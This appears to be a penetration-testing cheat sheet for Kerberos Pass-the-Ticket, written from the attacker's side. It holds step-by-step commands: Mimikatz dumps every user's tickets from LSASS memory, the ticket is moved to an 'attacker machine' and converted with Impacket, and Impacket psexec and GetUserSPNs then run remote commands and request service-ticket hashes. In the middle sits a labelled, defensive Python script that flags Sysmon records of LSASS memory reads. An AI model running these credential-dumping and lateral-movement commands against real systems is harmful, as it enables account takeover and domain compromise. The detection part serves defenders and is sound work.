Pass the ticket

Mimikatz

1. Dump all tickets from memory on the compromised system.

Condition: To export the tickets, we need administrative privileges on the target system, at least Local Administrator.

SEKURLSA::tickets - Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer's AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of other sessions (users). - ADSecurity.org

mimikatz# privilege::debug
mimikatz# SEKURLSA::tickets /export
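Because sekurlsa reads ticket material straight out of LSASS memory, the matching defensive check is a triage of Sysmon ProcessAccess (Event ID 10) records for handles to lsass.exe that carry read access. The following Python is an added example, not part of the original page or of Mimikatz/Impacket; the allowlist and the sample records are constructed assumptions.

```python
import re
from dataclasses import dataclass

PROCESS_VM_READ = 0x0010  # access right needed to read another process's memory
# Assumption: allowlist of images that legitimately open LSASS; tune per environment.
KNOWN_READERS = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}

@dataclass
class ProcessAccess:
    source: str   # SourceImage
    target: str   # TargetImage
    granted: int  # GrantedAccess mask

def parse_events(text: str) -> list[ProcessAccess]:
    """Parse Sysmon Event ID 10 records in the Event Viewer 'Key: value' layout."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        f = dict(re.findall(r"^(\w+): (.*)$", block, re.M))
        if "GrantedAccess" in f:  # only ProcessAccess records carry this field
            events.append(ProcessAccess(f["SourceImage"], f["TargetImage"], int(f["GrantedAccess"], 16)))
    return events

def suspicious_lsass_access(events: list[ProcessAccess]) -> list[ProcessAccess]:
    """Flag handles to lsass.exe that include VM_READ from a non-allowlisted image."""
    return [e for e in events
            if e.target.lower().endswith(r"\lsass.exe")
            and e.granted & PROCESS_VM_READ
            and e.source.lower() not in KNOWN_READERS]

# Constructed sample log: a memory read from an unknown tool (0x1010 = QUERY_INFORMATION|VM_READ),
# an allowlisted reader, and a query-only handle (0x1400 carries no VM_READ bit).
SAMPLE_EVENTS = r"""
SourceImage: C:\Users\bob\Desktop\tool.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1010
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4a4|UNKNOWN(00007FF6A1B20000)

SourceImage: C:\Windows\system32\csrss.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1fffff

SourceImage: C:\Windows\system32\taskmgr.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1400
"""

if __name__ == "__main__":
    for hit in suspicious_lsass_access(parse_events(SAMPLE_EVENTS)):
        print(f"{hit.source} opened {hit.target} with 0x{hit.granted:x}")
```

Only the unknown tool is reported; the same logic applies to a real Sysmon export once the records are split per event.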

2. Transfer the .kirbi ticket to our attacker machine.

3. Convert the ticket format

Use the script impacket-ticketConverter to convert the .kirbi ticket into a .ccache ticket. This converts the ticket between the Windows (.kirbi) and Linux (.ccache) formats.

root@kali# impacket-ticketConverter krbtgt-XOR.COM.kirbi krbtgt-XOR.COM.ccache

4. Export the ticket for Impacket use

root@kali# export KRB5CCNAME=krbtgt-XOR.COM.ccache

5. Execute commands

Now that our ticket has been exported, we can use the ticket to execute remote commands on the target system.

-k: Tells Impacket to use Kerberos authentication. Grabs credentials from the ccache file (KRB5CCNAME) based on the target parameters.

-no-pass: Do not prompt for a password (used together with -k).

Example of executing a remote command via psexec:

root@kali# impacket-psexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Example of requesting Kerberos service ticket hashes for SPN accounts with GetUserSPNs:

impacket-GetUserSPNs -request -dc-ip 10.11.1.120 -k -no-pass 'XOR.COM/XOR-APP59$'
